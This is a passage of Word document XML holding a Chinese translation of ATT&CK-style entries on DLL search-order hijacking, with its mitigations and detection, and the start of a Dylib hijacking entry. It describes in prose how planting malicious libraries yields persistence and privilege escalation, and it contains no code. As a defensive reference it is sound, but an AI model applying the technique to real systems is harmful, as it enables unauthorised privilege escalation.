            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，动态链接库监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67AB54B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>进程白名单</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32DD2062" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId51" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-471</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683022C5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Stefan Kanthak</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B2D13C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E1970C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4107BB30" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统使用常用方法来查找加载到程序中的必要的动态链接库。攻击者可能会利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库搜索顺序以及模糊指定动态链接库的程序来获得权限提升和持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A4EBD0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会通过在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的合法动态链接库之前的搜索位置放置与模糊指定的动态链接库同名的恶意动态链接库来实现预加载，也称为二进制植入攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常，此位置是程序的当前工作目录。当程序在加载动态链接库之前将其当前目录设置为远程位置（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共享）时，会发生远程动态链接库预加载攻击。攻击者的此行为会导致程序加载恶意动态链接库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F7806D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者还</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过替换现有动态链接库或修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.manifest</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重定向文件、目录或联结来直接修改程序加载动态链接库的方式，使得程序加载不同的动态链接库来维持持久性或获得权限提升。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F06A4B8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果搜索顺序易受攻击的程序配置为需更高权限级别运行，则加载的攻击者控制的动态链接库也将以更高级别执行。在这种情况下，该技术可用于从用户到管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统或从管理员到系统的权限提升，具体取决于程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA1FDA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受路径劫持影响的程序的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能看起来是正常的，因为恶意动态链接库可能配置为加载它们要替换的合法动态链接库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD4D585" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="007A0695" w14:paraId="1FB55004" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0C103BAB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="65CDB568" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6FA7ABAA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09CB7F40" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EDD6CE6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用审核工具来检测企业系统中动态链接库搜索顺序劫持情况并对检测到</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的情况进行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>纠正。像</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
              <w:t>PowerSploit</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>框架这样的工具包包含</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>owerUp</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>模块，可用于探索系统中的动态链接库劫持漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="659D383B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E71791E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId52" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>执行预防</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32403E27" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者可能会使用新的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态链接库</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来实施此技术。使用能够阻止合法软件加载动态链接库的应用白名单解决方案来识别并阻止通过搜索顺序劫持执行的潜在恶意软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="718BD43F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B831602" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>库加载限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EF03E1E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁止加载远程动态链接库。默认情况下，这包含在</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows Server 2012+</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中，也可以在</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XP +</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Server 2003+</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>上打补丁</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>来获得</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。启用</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>Safe DLL Search Mode</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来强制在</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>搜索本地目录</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（例如</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>用户家目录</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）之前</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>先</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>搜索具有更大限制的目录（例如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>%SYSTEMROOT%</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。可以通过组策略在</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>以下路径</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>Safe DLL Search Mode</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：配置</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; [</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>策略</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理模板</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; MSS</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（旧版）：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>MSS</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：（</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SafeDllSearchMode</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:t>Enable Safe DLL search mode</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。相关的</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表项位于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C5A5C71" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51990FBA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD20A4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控文件系统来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库移动，重命名，替换或修改行为。若进程加载的动态链接库集（与过去的行为相比）中的变化与已知软件、补丁等无关，则这些变化是可疑的。监控加载到进程中的动态链接库，并检测具有相同文件名但路径异常的动态链接库。修改或创建与软件更新无关的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.manifest</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重定向文件是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA3E1F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Dylib</w:t>
      </w:r>
      <w:r w:rsidRPr="00380E97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="0342799A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="038DFF8F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>: T1157</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7991D1AF" w14:textId="41BC75A6" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
